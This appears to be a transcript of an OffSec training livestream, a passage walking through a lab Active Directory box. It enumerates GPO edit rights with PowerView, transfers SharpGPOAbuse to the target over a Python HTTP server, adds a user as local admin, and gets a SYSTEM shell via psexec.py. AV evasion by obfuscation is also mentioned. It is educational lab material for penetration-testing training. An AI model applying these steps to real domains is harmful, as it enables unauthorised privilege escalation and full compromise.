we got PowerView. Did anybody notice what we want to go after with PowerView here? Did anybody notice at all? Anybody? Will this lesson be made available on YouTube? 100%. Absolutely. Absolutely. It will. It will be there. One thing I noticed is that everything is enabled. Absolutely everything is enabled, right? We talked about that. What I'm going to do is try and get something called a group policy. If anybody's done Windows domain user administration, you know exactly what I'm going to try and do here to get vertical escalation. If anybody knows, I see a big old yarp there, up priv, yeah. So what we're going to do, I'm going to cancel this, close that port, bring this on down to Funky-Town, there we go. And what we're going to do is PowerShell, or well, if we're in PowerShell, we could really just run /powerview.ps1. And then the idea here is that we're going to type get-gpo, okay, dash name, and what do we want? Default. Any Windows domain administrations out there? I'm not going to complete it. What do we want? What do we want? Default. Anybody? Default admins. I like what we're thinking. Tokyo's got it, thinking on the right lines here. Summer says user. I like it. I like it. We're looking at policies with GPO, right? Boom. Groove RR has it. We want the domain policy. So we're going to go ahead and put in default domain policy. Okay? And lo and behold, look at what we have here. Look at what, hello Active Directory pen testing question mark? That's correct. Look at what we have here. Which piece of information from this default domain policy enumerated are we really interested in? Anybody? Any Windows domain administrators out there? Anybody? Not exactly just the GPO status. Yes, all settings enabled. That is true. I like that. I do like that. More importantly, we want the ID, the identification number. And I'm about to show you why. About to show you why. Can anybody tell me why we would want the identification number for the default domain policy? We're going to do this. We're going to say get-gp permission -GUID. It's like a group ID, the default domain policy, right? There's groups that can be assigned the default domain policy. And if we have this identification number, we can do some kind of special things. Like we can target a specific user, right? Target type is user. Target name, any root. Very English stuff here. Very English, very plain. We're saying get the GPP permission using that corresponds to this GUID, which is the default domain policy, with the target type of user and target name of any root. And let's see what we could do with any root. What could we do? Apparently anything. GPO edit, delete, modify. That is the level of permission that this particular user has, right? They can GPO edit, delete, and modify, right? So this is potentially extremely lethal. Extremely lethal. So, can anybody tell me with this type of information, let's go ahead and get this over to our notes, right? Under privesc, right? Any root. And what are we interested in here? This. We can edit / modify. Why would we be interested in editing or modifying anything group policy, especially default domain policy stuff? Why would we be interested in that? Oh, boom, CaliMax6 coming in fast as lightning. Add the current user to domain administrator group, RDP group, etc. Oh my God, man. You guys are making this way too easy. Who's going to get that first place prize at the Hack-A-Thon? Who's going to get it? Because this is ridiculous. Let's go. Let's absolutely go. Now, in order to perform this kind of action, whoa, don't say not me. Don't say not me. It could be you. It could be you. It could be you. Or it could be your friends. But let's see. Let's see, guys. What is a particular type of executable where we can abuse these cough, where we can abuse these types of policies? Does anybody know? Anybody know? I'll give it about 20, 30 seconds. If the chat doesn't know, the chat doesn't know, and that's okay. That's okay. But I got a feeling. PS Exic? Nada. Nada. I like where you're going with PS Exic, though. I like what you're thinking. I like what you're thinking. Guys, I'm going to introduce you to something known as Sharp. So if you ever notice that you're able to GPO edit, modify, or delete with a particular user, I want you to think, not power tools. It's known as Sharp GPO abuse. And I'll type in GitHub and let me wait while that loads. Looky, looky, looky. Sharp GPO abuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a group policy object, or GPO, in order to compromise the objects that are controlled by that GPO. That sounds tasty, all kinds of nice. So, you know me, I have all my payloads localized, man. I'm going to locate this binary sharp GPO abuse.exe. I'm going to copy it, like from here, and so on, and look at what we have. So sharp GPO abuse.exe. And I have my little maintenance directory, right? And then what we're gonna do is drop a simple HTTP server. That's basically Python. To be clear, this is just a bash alias. If I cat, root.bashrc and grep-i for simple HTTP, this is the command. I drop an ifconfig on ton0 grepping for inet so I can get my IP address, attacking IP, and then I pull that into python-module http.server. So I just tab it out, it's done, and I'm serving. That simple. 2isTV says, nice to see you still doing these streams, S1REN, dude. I am glad to be here. Nice to see that you guys are still coming around. Heck yeah. Silly Willy says, would GP edit be better if it's already on the system? Would blend instead of transferring another file and leaving another artifact? It could. But we're going to go with this because, quite frankly, this has worked for me more consistently. The sharp GPO abuse binary itself. It's just, you know what I mean? Yeah, fair enough. Yeah, it has worked more consistently for me, so we're going to go with this. But we're going to drop this here. So I'm going to curl HTTP on 8000/sharp GPO abuse.exe. And we'll dash output that as sharp GPO abuse.exe. And code 200, let it transfer. Directory. There it is. Excelente. Wonderful. You could obfuscate the exe to be GP edit. I like that. Summers. God, so freaking lethal, man. So freaking lethal. Amen to that. You could obfuscate the exe to be GP edit. You certainly could. You could do a lot of obfuscation techniques that we teach in the OSCP. There's a lot of techniques, bypassing antivirus, AV evasion, all that kind of fun jazz. But moving forward, let's go ahead and take a look at what's worked for me in the past, which is sharp GPO abuse. Let's review. We have the ability to edit the group policies that correspond to this ID, which in review is the default domain policy. And sharp GPO abuse is going to allow us to abuse that. So what we're going to do is // GPO abuse.exe. And we're going to say -- add local admin -- user account. And we know one user that exists, which is us, Annie Rude, right? And then what? -- GPO name, because we need to specify the group policy that we're talking about. Default domain policy. There we go. And I think that's right. -- add local admin, and then we do user account, the user, GPO name, and then the name of the group. So all things considered, that should run. Yes, done. Okay, good. Now can anybody, let's do quick. Net user Annie Rude? No, it's not a member of the administrators group. Why? Net local group administrators? Oh, man. First time chat from Angry Yanni Geary has an answer. When you modify something, what do we need to do on Windows? Think Windows, guys. When we make that modification, what do we need to call on? A binary to reload the modules, the runtime modules, right? GPU or GP update, group policy update /force. /force. And it's hanging. So shout outs to Uri Zen Lux there with that answer, and shout outs to Angry Yanni Gary with the first answer and the first time chat. Welcome to the stream, by the way. Absolutely. So, we got it. Computer policy update has completed successfully. User policy update has completed successfully. Let's run, net share, net user Annie Rude. It's not bling bling yet. Okay, we still have to locate psexec.py, and what we're going to do is grab psexec.py, and then what? What do we do with the psexec? In fact, did I export my environment variable? I did. Okay, so with psexec, someone mentioned this way back at the beginning. They were thinking about it, and I said, you're thinking along the right lines, because yes, the answer is yes, and you know what I mean. So psexec is how we're going to get in. But what is the format here? What is the format for that kind of thing? Not RDP. No. Remember what we enumerated earlier, guys. Let's go back up. Over and over. Vault.offsec, dc.vault.offsec, and then straight up from ntlm info, DNS domain name, vault.offsec. So it's going to be this terminal down here. Let's bring this up, enlarge this maybe a little bit. I don't know. Bring that up to the top. There we go. That was bugging me. But yeah, so we're going to go ahead and just type vault.offsec / the user goes here, right? And we have Annie Rude, right? And then this is a username password combination. So secure HM at what? The target IP. Now, you guys tell me when you're ready for me to hit the return key. Come on. Let's get hype. Because that was a surgical dismantling of the integrity of that machine. Let's go. Let's get it now. All right. Requesting shares. Yeah, buddy. got it. Who am I? NT Authority System. That is what we like to call bling bling. That is bling bling. System level NT System Authority. LOL. I love the chat right now. Wow. Yes. Tutorial complete. Yeah, you've just been blung. You've been blung. Bling and bling. That is NT System Authority. So let's CD here. CD to users. I'm going to CD to the administrator directory. And we're going to go to desktop. And this is where I would type the proof.txt, right? And then we do an IP config and a host name. Hit print screen, and I'll select this area here. Oh, no, wait. And who am I? And print screen. And, we'll grab all of this. And this is going to go in our formal report as evidence of complete and total compromise of the remote target server during our engagement, guys. This is what the stakeholders, the clients, this is what they're going to want to see. They're going to want to see what level of compromise, what machine, what host name, what domain, what networking information, and we'll go ahead and snapshot that. With that being said, let's go ahead and grab all this and let's do a little recap, right? Little recap. Under here, we were able to then do what? We were then able to, I said we already have bold up here, edit and modify. And, this is cause for GPO editing or sharp GPO abuse. And we added our user, Anirudh, as an administrator user. We then used psexec with the following command to gain NT System Authority over the target machine. And I'm going to grab that command right there. And this way you guys can kind of just have it in your notes, right? That way you can kind of have it in your notes. I'm going to Control A, Control C. And if you head over to the Discord, this is in the general chat, guys, the general chat. I'm going to put vault here, and then in parentheses, we're going to include message.txt, I guess, because Discord won't allow too big of messages. But incoming. Boom. So, if you would ever like a review of what we did for this AD machine, you can definitely check out message.txt there, or review the VOD itself for extra details, or check it out on our official YouTube channel. Am I right or am I right? So, speaking of which, let's go ahead over here. My cat is like crawling on my table. Please don't walk on my keyboard. I love you. Please don't walk on my keyboard. You're the best. Okay, so what we're going to do is go to offsec.com/webinars. And we're going to see if there's any upcoming webinars additionally from OffSec. Offensive Security. We have Paul Griffin, right? Head of Customer Success at OffSec. And the VP of Operations actually at Packet Labs, Dennis Kusinik, I want to say. Well, Dennis, we're glad to have you as a podcast, a webinar guest, and can't wait for that. If you want to review anything else, look at the collection, this freaking massive archive from some of the most influential people at OffSec or in the industry. Check that out as well. Additionally, let's go to courses and certifications, or just, check this out. I personally am a fan of this one right here. It's becoming larger in the industry, especially if you work in application security. It is known as the OSWA or Web 200 here at Offensive Security. And we're very proud of this one as well, as much as many of our others, man. SSD, our cloud, and obviously our core, the OSCP, our binary exploitation, the whole thing is right there. So what we're going to do is go back to the broadcast, stream ending. Are there any additional questions? Taking a look over at the chat. Let's see. Mucho importante. Thank you very much. My pleasure. My pleasure. So the next time I will be personally streaming is this coming month on Friday at 2:30 p.m. Eastern, and we're going to do another Active Directory box. Tomorrow, however, we are going to be concluding the preparation here for the Hack-A-Thon with Siddiqui. And Siddiqui is going to be doing another machine, of which just go on up, scroll all the way to the top in the official Offensive Security Discord, and make sure you check that out. So what we're going to do is kind of just conclude the machine, conclude the stream here. Thank you guys for all attending. You are the heartbeat of this organization. We love you very much. To each and every student, keep trying, keep doing your best. You will succeed. If you give it your all, you will succeed. And that being said, happy hacking, intruders.